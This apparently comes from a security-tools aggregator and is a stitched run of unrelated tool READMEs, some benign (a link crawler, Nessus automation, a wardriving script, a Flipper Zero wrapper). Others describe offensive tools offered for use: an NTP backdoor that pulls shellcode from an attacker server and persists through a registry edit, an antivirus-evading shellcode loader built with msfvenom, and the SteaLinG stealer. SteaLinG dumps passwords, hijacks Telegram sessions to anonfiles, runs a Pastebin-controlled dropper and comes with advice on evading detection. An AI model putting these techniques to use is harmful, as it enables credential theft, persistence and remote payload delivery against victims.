  • Payload Url: The URL to your shellcode, it could be your agent (for example, CobaltStrike or meterpreter) or another stager.

  • IP to Spoof: If you want to spoof a legitimate IP address (for example, time.microsoft.com's IP address).

SandmanBackdoor (Usage)

To start, you can compile the SandmanBackdoor as mentioned below, because it is a single lightweight C# executable you can execute it via ExecuteAssembly, run it as an NTP provider or just execute/inject it.

SandmanBackdoorTimeProvider (Usage)

To use it, you will need to follow simple steps:

  • Add the following registry value:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\Path\To\TheDll.dll"
  • Restart the w32time service:
sc stop w32time
sc start w32time

NOTE: Make sure you are compiling with the x64 option and not any CPU option!

Capabilities

  • Getting and executing an arbitrary payload from an attacker's controlled server.

  • Can work on hardened networks since NTP is usually allowed in FW.

  • Impersonating a legitimate NTP server via IP spoofing.

Setup

SandmanServer (Setup)

SandmanBackdoor (Setup)

To compile the backdoor I used Visual Studio 2022, but as mentioned in the usage section it can be compiled with both VS2022 and CSC. You can compile it either with USE_SHELLCODE defined, to use Orca's shellcode, or without USE_SHELLCODE, to use WebClient.

SandmanBackdoorTimeProvider (Setup)

To compile the backdoor I used Visual Studio 2022; you will also need to install DllExport (via NuGet or any other way) to compile it. You can compile it either with USE_SHELLCODE defined, to use Orca's shellcode, or without USE_SHELLCODE, to use WebClient.

IOCs

  • A shellcode is injected into RuntimeBroker.

  • Suspicious NTP communication starts with a known magic header.

  • YARA rule.

Contributing

Thanks to those who already contributed! I'll happily accept contributions; make a pull request and I will review it.



xnLinkFinder - A Python Tool Used To Discover Endpoints (And Potential Parameters) For A Given Target

About - v2.0

This is a tool used to discover endpoints (and potential parameters) for a given target. It can find them by:

  • crawling a target (pass a domain/URL)
  • crawling multiple targets (pass a file of domains/URLs)
  • searching files in a given directory (pass a directory name)
  • get them from a Burp project (pass location of a Burp XML file)
  • get them from an OWASP ZAP project (pass location of a ZAP ASCII message file)

The python script is based on the link finding capabilities of my Burp extension GAP. As a starting point, I took the amazing tool LinkFinder by Gerben Javado, and used the Regex for finding links, but with additional improvements to find even more.


Installation

xnLinkFinder supports Python 3.

$ git clone https://github.com/xnl-h4ck3r/xnLinkFinder.git
$ cd xnLinkFinder
$ sudo python setup.py install

Usage

Arg Long Arg Description
-i --input Input a: URL, text file of URLs, a Directory of files to search, a Burp XML output file or an OWASP ZAP output file.
-o --output The file to save the Links output to, including path if necessary (default: output.txt). If set to cli then output is only written to STDOUT. If the file already exists it will just be appended to (and de-duplicated) unless option -ow is passed.
-op --output-params The file to save the Potential Parameters output to, including path if necessary (default: parameters.txt). If set to cli then output is only written to STDOUT (but not piped to another program). If the file already exists it will just be appended to (and de-duplicated) unless option -ow is passed.
-ow --output-overwrite If the output file already exists, it will be overwritten instead of being appended to.
-sp --scope-prefix Any links found starting with / will be prefixed with scope domains in the output instead of the original link. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used.
-spo --scope-prefix-original If argument -sp is passed, then this determines whether the original link starting with / is also included in the output (default: false)
-sf --scope-filter Will filter output links to only include them if the domain of the link is in the scope specified. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used.
-c --cookies โ€  Add cookies to pass with HTTP requests. Pass in the format 'name1=value1; name2=value2;'
-H --headers โ€  Add custom headers to pass with HTTP requests. Pass in the format 'Header1: value1; Header2: value2;'
-ra --regex-after RegEx for filtering purposes against found endpoints before output (e.g. /api/v[0-9]\.[0-9]\* ). If it matches, the link is output.
-d --depth โ€  The level of depth to search. For example, if a value of 2 is passed, then all links initially found will then be searched for more links (default: 1). This option is ignored for Burp files because they can be huge and consume lots of memory. It is also advisable to use the -sp (--scope-prefix) argument to ensure a request to links found without a domain can be attempted.
-p --processes โ€  Basic multithreading is done when getting requests for a URL, or file of URLs (not a Burp file). This argument determines the number of processes (threads) used (default: 25)
-x --exclude Additional Link exclusions (to the list in config.yml) in a comma separated list, e.g. careers,forum
-orig --origin Whether you want the origin of the link to be in the output. Displayed as LINK-URL [ORIGIN-URL] in the output (default: false)
-t --timeout โ€  How many seconds to wait for the server to send data before giving up (default: 10 seconds)
-inc --include Include input (-i) links in the output (default: false)
-u --user-agent โ€  What User Agents to get links for, e.g. -u desktop mobile
-insecure โ€  Whether TLS certificate checks should be disabled when making requests (default: false)
-s429 โ€  Stop when > 95 percent of responses return 429 Too Many Requests (default: false)
-s403 โ€  Stop when > 95 percent of responses return 403 Forbidden (default: false)
-sTO โ€  Stop when > 95 percent of requests time out (default: false)
-sCE โ€  Stop when > 95 percent of requests have connection errors (default: false)
-m --memory-threshold The memory threshold percentage. If the machine's memory goes above the threshold, the program will be stopped and ended gracefully before running out of memory (default: 95)
-mfs --max-file-size โ€  The maximum file size (in bytes) of a file to be checked if -i is a directory. If the file size is over, it will be ignored (default: 500 MB). Setting to 0 means no files will be ignored, regardless of size.
-replay-proxy โ€  For active link finding with URL (or file of URLs), replay the requests through this proxy.
-ascii-only Whether links and parameters will only be added if they only contain ASCII characters. This can be useful when you know the target is likely to use ASCII characters and you also get a number of false positives from binary files for some reason.
-v --verbose Verbose output
-vv --vverbose Increased verbose output
-h --help show the help message and exit

โ€  NOT RELEVANT FOR INPUT OF DIRECTORY, BURP XML FILE OR OWASP ZAP FILE

config.yml

The config.yml file has the keys which can be updated to suit your needs:

  • linkExclude - A comma separated list of strings (e.g. .css,.jpg,.jpeg etc.) that all links are checked against. If a link includes any of the strings then it will be excluded from the output. If the input is a directory, then file names are checked against this list.
  • contentExclude - A comma separated list of strings (e.g. text/css,image/jpeg,image/jpg etc.) that all responses Content-Type headers are checked against. Any responses with the these content types will be excluded and not checked for links.
  • fileExtExclude - A comma separated list of strings (e.g. .zip,.gz,.tar etc.) that all files in Directory mode are checked against. If a file has one of those extensions it will not be searched for links.
  • regexFiles - A list of file types separated by a pipe character (e.g. php|php3|php5 etc.). These are used in the Link Finding Regex when there are findings that aren't obvious links, but are interesting file types that you want to pick out. If you add to this list, ensure you escape any dots to ensure correct regex, e.g. js\.map
  • respParamLinksFound โ€  - Whether to get potential parameters from links found in responses: True or False
  • respParamPathWords โ€  - Whether to add path words in retrieved links as potential parameters: True or False
  • respParamJSON โ€  - If the MIME type of the response contains JSON, whether to add JSON Key values as potential parameters: True or False
  • respParamJSVars โ€  - Whether javascript variables set with var, let or const are added as potential parameters: True or False
  • respParamXML โ€  - If the MIME type of the response contains XML, whether to add XML attributes values as potential parameters: True or False
  • respParamInputField โ€  - If the MIME type of the response contains HTML, whether to add NAME and ID attributes of any INPUT fields as potential parameters: True or False
  • respParamMetaName โ€  - If the MIME type of the response contains HTML, whether to add NAME attributes of any META tags as potential parameters: True or False

โ€  IF THESE ARE NOT FOUND IN THE CONFIG FILE THEY WILL DEFAULT TO True

Examples

Find Links from a specific target - Basic

python3 xnLinkFinder.py -i target.com

Find Links from a specific target - Detailed

Ideally, provide a scope prefix (-sp) with the primary domain (including schema), and a scope filter (-sf) to filter the results only to relevant domains (this can be a file or in-scope domains). Also, you can pass cookies and custom headers to ensure you find links only available to authorised users. Specifying the User Agent (-u desktop mobile) will first search for all links using desktop User Agents, and then try again using mobile user agents. There could be specific endpoints that are related to the user agent given. Giving a depth value (-d) will keep sending requests to links found on the previous depth search to find more links.

python3 xnLinkFinder.py -i target.com -sp target_prefix.txt -sf target_scope.txt -spo -inc -vv -H 'Authorization: Bearer XXXXXXXXXXXXXX' -c 'SessionId=MYSESSIONID' -u desktop mobile -d 10

Find Links from a list of URLs - Basic

If you have a file of JS file URLs for example, you can look for links in those:

python3 xnLinkFinder.py -i target_js.txt

Find Links from files in a directory - Basic

If you have files, e.g. JS files, HTTP responses, etc. you can look for links in those:

python3 xnLinkFinder.py -i ~/Tools/waymore/results/target.com

NOTE: Sub directories are also checked. The -mfs option can be specified to skip files over a certain size.

Find Links from a Burp project - Basic

In Burp, select the items you want to search (by highlighting the scope, for example), right clicking and selecting Save selected items. Ensure that the base64-encode requests and responses option is checked before saving. To get all links from the file (even with HUGE files, you'll be able to get all the links):

python3 xnLinkFinder.py -i target_burp.xml

NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i starts with <?xml then you are trying to process a Burp file.

Find Links from a Burp project - Detailed

Ideally, provide scope prefix (-sp) with the primary domain (including schema), and a scope filter (-sf) to filter the results only to relevant domains.

python3 xnLinkFinder.py -i target_burp.xml -o target_burp.txt -sp https://www.target.com -sf target.* -ow -spo -inc -vv

Find Links from an OWASP ZAP project - Basic

In ZAP, select the items you want to search by highlighting the History for example, clicking menu Report and selecting Export Messages to File.... This will let you save an ASCII text file of all requests and responses you want to search. To get all links from the file (even with HUGE files, you'll be able to get all the links):

python3 xnLinkFinder.py -i target_zap.txt

NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i is in the format ==== 99 ========== for example, then you are trying to process an OWASP ZAP ASCII text file.

Piping to other Tools

You can pipe xnLinkFinder to other tools. Any errors are sent to stderr and any links found are sent to stdout. The output file is still created in addition to the links being piped to the next program. However, potential parameters are not piped to the next program, but they are still written to file. For example:

python3 xnLinkFinder.py -i redbull.com -sp https://redbull.com -sf redbull.* -d 3 | unfurl keys | sort -u

You can also pass the input through stdin instead of -i.

cat redbull_subs.txt | python3 xnLinkFinder.py -sp https://redbull.com -sf redbull.* -d 3

NOTE: You can't pipe in a Burp or ZAP file, these must be passed using -i.

Recommendations and Notes

  • Always use the Scope Prefix argument -sp. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no path should be included, and no wildcards used. Schema is optional, but will default to http):
    http://www.target.com
    https://target-payments.com
    https://static.target-cdn.com
    If a link is found that has no domain, e.g. /path/to/example.js, then passing -sp http://www.target.com will result in the output http://www.target.com/path/to/example.js, and if Depth (-d) is >1 then a request will be able to be made to that URL to search for more links. If a file of domains is passed using -sp then the output will include each domain followed by /path/to/example.js and increase the chance of finding more links.
  • If you use -sp but still want the original link of /path/to/example.js (without a domain) additionally returned in the output, then pass the argument -spo.
  • Always use the Scope Filter argument -sf. This will ensure that only relevant domains are returned in the output, and more importantly if Depth (-d) is >1 then out of scope targets will not be searched for links or parameters. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no schema or path should be included):
    target.*
    target-payments.com
    static.target-cdn.com
    THIS IS FOR FILTERING THE LINKS DOMAIN ONLY.
  • If you want to filter the final output in any way, use -ra. It's always a good idea to use https://regex101.com/ to check your Regex expression is going to do what you expect.
  • Use the -v option to have a better idea of what the tool is doing.
  • If you have problems, use the -vv option which may show errors that are occurring, which can possibly be resolved, or you can raise as an issue on github.
  • Pass cookies (-c), headers (-H) and regex (-ra) values within single quotes, e.g. -ra '/api/v[0-9]\.[0-9]\*'
  • Set the -o option to give a specific output file name for Links, rather than the default of output.txt. If you plan on running a large depth of searches, start with 2 with option -v to check what is being returned. Then you can increase the Depth, and the new output will be appended to the existing file, unless you pass -ow.
  • Set the -op option to give a specific output file name for Potential Parameters, rather than the default of parameters.txt. Any output will be appended to the existing file, unless you pass -ow.
  • If using a high Depth (-d) be wary of some sites using dynamic links, as it will just keep finding new ones. If no new links are being found, then xnLinkFinder will stop searching. Providing the Stop flags (-s429, -s403, -sTO, -sCE) should also be considered.
  • If you are finding a large number of links (especially if the Depth (-d) value is high) and have limited resources, the program will stop when it reaches the memory Threshold (-m) value and end gracefully with data intact before getting killed.
  • If you decide to cancel xnLinkFinder (using Ctrl-C) in the middle of running, be patient and any gathered data will be saved before ending gracefully.
  • Using the -orig option will show the URL where the link was found. This can mean you have duplicate links in the output if the same link was found on multiple sources, but each will be suffixed with the origin URL in square brackets.
  • When making requests, xnLinkFinder will use a random User-Agent from the current group, which defaults to desktop. If you have a target that could have different links for different user agent groups, then specify -u desktop mobile for example (separated with a space). The mobile user agent option is a combination of mobile-apple, mobile-android and mobile-windows.
  • When -i has been set to a directory, the contents of the files in the root of that directory will be searched for links. Files in sub-directories are not searched. Any files that are over the size set by -mfs (default: 500 MB) will be skipped.
  • When using the -replay-proxy option, sometimes requests can take longer. If you start seeing more Request Timeout errors (you'll see errors if you use -v or -vv options) then consider using -t to raise the timeout limit.
  • If you know a target will only have ASCII characters in links and parameters then consider passing -ascii-only. This can eliminate a number of false positives that can sometimes get returned from binary data.

Issues

If you come across any problems at all, or have ideas for improvements, please feel free to raise an issue on Github. If there is a problem, it will be useful if you can provide the exact command you ran and a detailed description of the problem. If possible, run with -vv to reproduce the problem and let me know about any error messages that are given.

TODO

  • I seem to have completed all the TODOs I originally had! If you think of any that need adding, let me know.

Example output

Active link finding for a domain:

...

Piped input and output:

Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! โ˜• (I could use the caffeine!)

/XNL-h4ck3r


FUD-UUID-Shellcode - Another shellcode injection technique using C++ that attempts to bypass Windows Defender using XOR encryption sorcery and UUID strings madness


Introduction

Another shellcode injection technique using C++ that attempts to bypass Windows Defender using XOR encryption sorcery and UUID strings madness :).


How it works

Shellcode generation

  • Firstly, generate a payload in binary format (using either CobaltStrike or msfvenom). For instance, in msfvenom you can do it like so (the payload I'm using is for illustration purposes; you can use whatever payload you want):

    msfvenom -p windows/messagebox  -f raw -o shellcode.bin
  • Then convert the shellcode (in binary/raw format) into a UUID string format using the Python3 script bin_to_uuid.py (a sketch of this conversion follows this list):

    ./bin_to_uuid.py -p shellcode.bin > uuid.txt
  • XOR-encrypt the UUID strings in uuid.txt using the Python3 script xor_encryptor.py:

    ./xor_encryptor.py uuid.txt > xor_crypted_out.txt
  • Copy the C-style array in the file xor_crypted_out.txt and paste it into the C++ file as an array of unsigned char, i.e. unsigned char payload[]{your_output_from_xor_crypted_out.txt}
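As referenced in the list above, the binary-to-UUID conversion is just a matter of slicing the shellcode into 16-byte chunks. A sketch of what bin_to_uuid.py plausibly does (bytes_le is used so that UuidFromStringA writes back the original byte order; the NOP padding byte is an assumption):

import uuid

def bin_to_uuids(path):
    data = open(path, "rb").read()
    data += b"\x90" * (-len(data) % 16)  #NOP-pad to a 16-byte boundary (assumption)
    #bytes_le matches the in-memory layout UuidFromStringA produces
    return [str(uuid.UUID(bytes_le=data[i:i + 16])) for i in range(0, len(data), 16)]

for u in bin_to_uuids("shellcode.bin"):
    print(u)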

Execution

This shellcode injection technique comprises the following subsequent steps:

  • First things first, it allocates virtual memory for payload execution and residence via VirtualAlloc
  • It xor decrypts the payload using the xor key value
  • Uses UuidFromStringA to convert UUID strings into their binary representation and store them in the previously allocated memory. This is used to avoid the usage of suspicious APIs like WriteProcessMemory or memcpy.
  • Use EnumChildWindows to execute the payload previously loaded into memory( in step 1 )

What makes it unique?

  • It doesn't use standard functions like memcpy or WriteProcessMemory, which are known to raise alarms to AVs/EDRs; this program uses the Windows API function UuidFromStringA, which can be used to decode data as well as write it to memory. (Isn't that great, folks? And please don't say "NO!" :) )
  • It uses the function call obfuscation trick to call the Windows API functions
  • Lastly, because it looks unique :) ( Isn't it? :) )

Important

  • You have to change the XOR key (row 86) to what you wish. This can be done in the xor_encryptor.py Python3 script by changing the KEY variable.
  • You have to change the default executable filename value (row 90) to your filename.
  • The command for compiling is provided in the C++ file (around the top). NB: mingw was used, but you can use whichever compiler you prefer. :)

Compile

make

Proof-of-Concept( PoC )

Static Analysis

AV Scan results

The binary was scanned using antiscan.me on 01/08/2022.

Credits

https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/



SteaLinG - Open-Source Penetration Testing Framework Designed For Social Engineering


SteaLinG is an open-source penetration testing framework designed for social engineering. After the hack, you can upload it to the victim's device and run it.

Disclaimer:

This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes

How can I benefit from this project?

  • You can use it
  • For developers: you can read the source code and try to understand how to make a project like this

Features


module Short description
Dump password Steals all saved passwords and uploads the saved-passwords file to Mega
Dump History Dumps browser history
Dump files Steals files from the hard drive with the extension you want

New features

module Short description
1-Telegram Session Hijack Telegram session hijacker
  • How it works? Telegram's session data is stored locally at C:\Users\<pc name>\AppData\Roaming\Telegram Desktop, in the 'tdata' folder:
C:
โ””โ”€โ”€ Users
โ”œโ”€โ”€ .AppData
โ”‚ย ย  โ””โ”€โ”€ Roaming
โ”‚ย ย  โ””โ”€โ”€ TelegramDesktop
โ”‚ย ย  โ””โ”€โ”€ tdata

Once this folder, with all its contents, is moved to the same path on your device, the session is restored; it is that simple, and the tool does all of this for you. All you have to do is give it your token from https://anonfiles.com/. The first step is to go to the path where the tdata folder is located and convert it to a zip file. Of course, if Telegram were running this would fail, so on any error the tool kills the Telegram processes; since antivirus would see killing processes as malicious behaviour, this part is wrapped in try/except in the code to avoid detection. The archive file is named after your victim's device, in case you have more than one victim. After that, the zip file is uploaded to anonfiles with a POST request using the API key (token) of your account on the site. Just that, and it is not flagged by any AV.

module
2- Dropper
  • What does it need from you, and how does it work?
    Requirements: the first thing it asks you for is the URL of the virus, or whatever you want downloaded to the victim's device. Keep in mind that the URL must be direct, i.e. it must end with the file itself, such as .exe or .png. The second thing is your Pastebin API key plus your username and password (register on the site, click on the word API, and you will find it). So how does it work?

The first thing it does is create a private paste on the site containing the URL you gave it, and then it gives you the exe file. When that exe runs on any device, it starts by adding itself to the device's registry in two different ways. It then opens Pastebin, reads the private paste you created, takes the URL from it, downloads its content and runs it. You can change the URL at any time: the dropper checks the paste every 10 minutes, and if the URL has changed it downloads and runs the new content. So, without doing anything else, you can literally reach your victim's device from anywhere.

3- Linux support

4-You can now choose between Mega or Pastebin

Requirements

  • python >= 3.8 (Download Python)
  • os : Windows
  • os : Linux

Installation to Windows:

git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
pip install -r requirements.txt
python SteaLinG.py

Installation to Linux

git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
chmod +x linux_setup.sh
bash linux_setup.sh
python SteaLinG.py

warning:

* Don't upload it to VirusTotal.com, because this tool will stop working over time.
* VirusTotal shares signatures with AV companies.
* Again, don't be an idiot!

AV detection


Media



Utkuici - Nessus Automation


Today, with the spread of information technology systems, investments in the field of cyber security have increased to a great extent. Vulnerability management, penetration tests and various analyses are carried out to accurately determine how much our institutions can be affected by cyber threats. With Tenable Nessus, the industry leader in vulnerability management tools, a newly joined IP address on the corporate network, a newly opened port, or an exploitable vulnerability can be identified. A Python application that integrates with Tenable Nessus has been developed to identify these events automatically.


Features

  • Finding New IP Address
  • Finding New Port
  • Finding New Exploitable Vulnerability

Installation

git clone https://github.com/anil-yelken/Nessus-Automation
cd Nessus-Automation
sudo pip3 install -r requirements.txt

Usage

The SIEM IP address in the code should be changed.

In order to detect a new IP address exactly, the script checks whether the phrase "Host Discovery" appears in the Nessus scan name; live IP addresses are recorded in the database with a timestamp, and any new IP address is sent to the SIEM (a sketch of this flow follows the usage examples below). The contents of the hosts table were as follows:

Usage: python finding-new-ip-nessus.py

By checking the port scans made by Nessus, the port-IP-timestamp information is recorded in the database; the script detects a newly opened service via the database and transmits the data to the SIEM in the form "New Port:" port-IP-timestamp. The result observed by the SIEM is as follows:

Usage: python finding-new-port-nessus.py

Among the findings of vulnerability scans made in institutions and organizations, exploitable vulnerabilities should be closed first. The script records vulnerabilities that can be exploited with Metasploit in the database, and when it finds a new exploitable vulnerability on the systems it transmits this information to the SIEM. Exploitable vulnerabilities observed by the SIEM:

Usage: python finding-exploitable-service-nessus.py
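A hedged sketch of the new-IP flow described above: pull hosts from "Host Discovery" scans via the Nessus REST API, diff them against a local database, and forward newcomers to the SIEM. The /scans endpoints and X-ApiKeys header are the documented Nessus API; the sqlite schema and the plain UDP syslog-style send are assumptions, not the script's actual code:

import sqlite3, socket, requests

NESSUS = "https://nessus.local:8834"
HEADERS = {"X-ApiKeys": "accessKey=ACCESS_KEY; secretKey=SECRET_KEY"}
SIEM = ("10.0.0.5", 514)  #change to your SIEM's address

db = sqlite3.connect("hosts.db")
db.execute("CREATE TABLE IF NOT EXISTS hosts "
           "(ip TEXT PRIMARY KEY, first_seen TEXT DEFAULT CURRENT_TIMESTAMP)")

scans = requests.get(f"{NESSUS}/scans", headers=HEADERS, verify=False).json()["scans"]
for scan in scans:
    if "Host Discovery" not in scan["name"]:
        continue
    detail = requests.get(f"{NESSUS}/scans/{scan['id']}", headers=HEADERS, verify=False).json()
    for host in detail.get("hosts", []):
        ip = host["hostname"]
        #Only hosts never seen before are forwarded to the SIEM
        if db.execute("SELECT 1 FROM hosts WHERE ip=?", (ip,)).fetchone() is None:
            db.execute("INSERT INTO hosts (ip) VALUES (?)", (ip,))
            socket.socket(socket.AF_INET, socket.SOCK_DGRAM).sendto(
                f"New IP: {ip}".encode(), SIEM)
db.commit()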

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



Bayanay - Python Wardriving Tool


WarDriving is the act of navigating, on foot or by car, to discover wireless networks in the surrounding area.

Features

Wardriving is done by combining the SSID information obtained with scapy with location information obtained via the HTML5 geolocation feature, as sketched below.
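A sketch of the scapy side of that: sniff 802.11 beacon frames in monitor mode and emit timestamp|MAC|SSID lines like the ssidBul.py output shown further down (the interface name is illustrative, and this is not Bayanay's actual code):

from datetime import datetime
from scapy.all import sniff, Dot11, Dot11Beacon, Dot11Elt

seen = set()

def handle(pkt):
    if pkt.haslayer(Dot11Beacon):
        bssid = pkt[Dot11].addr2              #BSSID of the access point
        ssid = pkt[Dot11Elt].info.decode(errors="replace")  #first element is the SSID
        if bssid not in seen:
            seen.add(bssid)
            stamp = datetime.now().strftime("%d %B %Y %I:%M%p")
            print(f"{stamp}|{bssid}|{ssid}")

sniff(iface="wlan0mon", prn=handle)  #adapter must be in monitor mode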


Usage

I cannot be held responsible for malicious use of the tool.

ssidBul.py has been tested with a TP-LINK TL-WN722N.

Selenium 3.11.0 and Firefox 59.0.2 are used for location.py. The Firefox geckodriver is located in the same directory as the code.

SSID and MAC names and location information were created and changed in the test environment.

ssidBul.py and location.py must be run concurrently.

ssidBul.py result:

20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M

20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068

Here is a screenshot of allowing location information while running location.py:

The screenshot of the location information is as follows:

konum.py result:

lat=38.8333635|lon=34.759741899|20 March 2018 11:47PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM

After the data collection processes, the following output is obtained as a result of running wardriving.py:

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



pyFlipper - Unoffical Flipper Zero Cli Wrapper Written In Python


Unoffical Flipper Zero cli wrapper written in Python

Functions and characteristics:

  • Flipper serial CLI wrapper
  • Websocket client interface

Setup instructions:

$ git clone https://github.com/wh00hw/pyFlipper.git
$ cd pyFlipper
$ python3 -m venv venv
$ source venv/bin/activate
$ pip install -r requirements.txt

Tested on:

  • Python 3.8.10 on Linux 5.4.0 x86_64
  • Python 3.10.5 on Android 12 (Termux + OTGSerial2WebSocket NO ROOT REQUIRED)

Usage/Examples

Connection

from pyflipper import PyFlipper

#Local serial port
flipper = PyFlipper(com="/dev/ttyACM0")

#OR

#Remote serial2websocket server
flipper = PyFlipper(ws="ws://192.168.1.5:1337")

Power

#Info
info = flipper.power.info()

#Poweroff
flipper.power.off()

#Reboot
flipper.power.reboot()

#Reboot in DFU mode
flipper.power.reboot2dfu()

Update/Backup

#Install update from .fuf file
flipper.update.install(fuf_file="/ext/update.fuf")

#Backup Flipper to .tar file
flipper.update.backup(dest_tar_file="/ext/backup.tar")

#Restore Flipper from backup .tar file
flipper.update.restore(bak_tar_file="/ext/backup.tar")

Loader

#List installed apps
apps = flipper.loader.list()

#Open app
flipper.loader.open(app_name="Clock")

Flipper Info

#Get flipper date
date = flipper.date.date()

#Get flipper timestamp
timestamp = flipper.date.timestamp()

#Get the processes dict list
ps = flipper.ps.list()

#Get device info dict
device_info = flipper.device_info.info()

#Get heap info dict
heap = flipper.free.info()

#Get free_blocks string
free_blocks = flipper.free.blocks()

#Get bluetooth info
bt_info = flipper.bt.info()

Storage

Filesystem Info

#Get the storage filesystem info
ext_info = flipper.storage.info(fs="/ext")

Explorer

#Get the storage /ext dict
ext_list = flipper.storage.list(path="/ext")

#Get the storage /ext tree dict
ext_tree = flipper.storage.tree(path="/ext")

#Get file info
file_info = flipper.storage.stat(file="/ext/foo/bar.txt")

#Make directory
flipper.storage.mkdir(new_dir="/ext/foo")

Files

#Read file
plain_text = flipper.storage.read(file="/ext/foo/bar.txt")

#Remove file
flipper.storage.remove(file="/ext/foo/bar.txt")

#Copy file
flipper.storage.copy(src="/ext/foo/source.txt", dest="/ext/bar/destination.txt")

#Rename file
flipper.storage.rename(file="/ext/foo/bar.txt", new_file="/ext/foo/rab.txt")

#MD5 Hash file
md5_hash = flipper.storage.md5(file="/ext/foo/bar.txt")

#Write file in one chunk
file = "/ext/bar.txt"

text = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""

flipper.storage.write.file(file, text)

#Write file using a listener
import time

file = "/ext/foo.txt"

text_one = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""

flipper.storage.write.start(file)

time.sleep(2)

flipper.storage.write.send(text_one)

text_two = """All the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as
necessary, making this the first true generator on the Internet.
It uses a dictionary of over 200 Latin words, combined with a handful of
model sentence structures, to generate Lorem Ipsum which looks reasonable.
The generated Lorem Ipsum is therefore always free from repetition, injected humour, or non-characteristic words etc.
"""
flipper.storage.write.send(text_two)

time.sleep(3)

#Don't forget to stop
flipper.storage.write.stop()

LED/Backlight

#Set generic led on (r,b,g,bl)
flipper.led.set(led='r', value=255)

#Set blue led off
flipper.led.blue(value=0)

#Set green led value
flipper.led.green(value=175)

#Set backlight on
flipper.led.backlight_on()

#Set backlight off
flipper.led.backlight_off()

#Turn off led
flipper.led.off()

Vibro

#Set vibro True or False
flipper.vibro.set(True)

#Set vibro on
flipper.vibro.on()

#Set vibro off
flipper.vibro.off()

GPIO

#Set gpio mode: 0 - input, 1 - output
flipper.gpio.mode(pin_name=PIN_NAME, value=1)

#Read gpio pin value
flipper.gpio.read(pin_name=PIN_NAME)

#Set gpio pin value
flipper.gpio.mode(pin_name=PIN_NAME, value=1)

MusicPlayer

#Play song in RTTTL format
rttl_song = "Littleroot Town - Pokemon:d=4,o=5,b=100:8c5,8f5,8g5,4a5,8p,8g5,8a5,8g5,8a5,8a#5,8p,4c6,8d6,8a5,8g5,8a5,8c#6,4d6,4e6,4d6,8a5,8g5,8f5,8e5,8f5,8a5,4d6,8d5,8e5,2f5,8c6,8a#5,8a#5,8a5,2f5,8d6,8a5,8a5,8g5,2f5,8p,8f5,8d5,8f5,8e5,4e5,8f5,8g5"

#Play in loop
flipper.music_player.play(rtttl_code=rttl_song)

#Stop loop
flipper.music_player.stop()

#Play for 20 seconds
flipper.music_player.play(rtttl_code=rttl_song, duration=20)

#Beep
flipper.music_player.beep()

#Beep for 5 seconds
flipper.music_player.beep(duration=5)

NFC

#Synchronous default timeout 5 seconds

#Detect NFC
nfc_detected = flipper.nfc.detect()

#Emulate NFC
flipper.nfc.emulate()

#Activate field
flipper.nfc.field()

RFID

#Synchronous default timeout 5 seconds

#Read RFID
rfid = flipper.rfid.read()

SubGhz

#Transmit hex_key N times(default count = 10)
flipper.subghz.tx(hex_key="DEADBEEF", frequency=433920000, count=5)

#Decode raw .sub file
decoded = flipper.subghz.decode_raw(sub_file="/ext/subghz/foo.sub")

Infrared

#Transmit hex_address and hex_command selecting a protocol
flipper.ir.tx(protocol="Samsung32", hex_address="C000FFEE", hex_command="DEADBEEF")

#Raw Transmit samples
flipper.ir.tx_raw(frequency=38000, duty_cycle=0.33, samples=[1337, 8888, 3000, 5555])

#Synchronous default timeout 5 seconds
#Receive tx
r = flipper.ir.rx(timeout=10)

IKEY

#Read (default timeout 5 seconds)
ikey = flipper.ikey.read()

#Write (default timeout 5 seconds)
ikey = flipper.ikey.write(key_type="Dallas", key_data="DEADBEEFCOOOFFEE")

#Emulate (default timeout 5 seconds)
flipper.ikey.emulate(key_type="Dallas", key_data="DEADBEEFCOOOFFEE")

Log

#Attach event logger (default timeout 10 seconds)
logs = flipper.log.attach()

Debug

#Activate debug mode
flipper.debug.on()

#Deactivate debug mode
flipper.debug.off()

Onewire

#Search
response = flipper.onewire.search()

I2C

#Get
response = flipper.i2c.get()

Input

#Input dump
dump = flipper.input.dump()

#Send input
flipper.input.send("up", "press")

Optimizations

Feel free to contribute in any way

  • Queue Thread orchestrator (check dev branch)
  • Implement all the cli functions
  • Async SubGhz Chat (check dev branch)

License

MIT

Buy me a pint

ZEC: zs13zdde4mu5rj5yjm2kt6al5yxz2qjjjgxau9zaxs6np9ldxj65cepfyw55qvfp9v8cvd725f7tz7

ETH: 0xef3cF1Eb85382EdEEE10A2df2b348866a35C6A54

BTC: 15umRZXBzgUacwLVgpLPoa2gv7MyoTrKat

Contacts

  • Discord: white_rabbit#4124
  • Twitter: @nic_whr
  • GPG: 0x94EDEADC


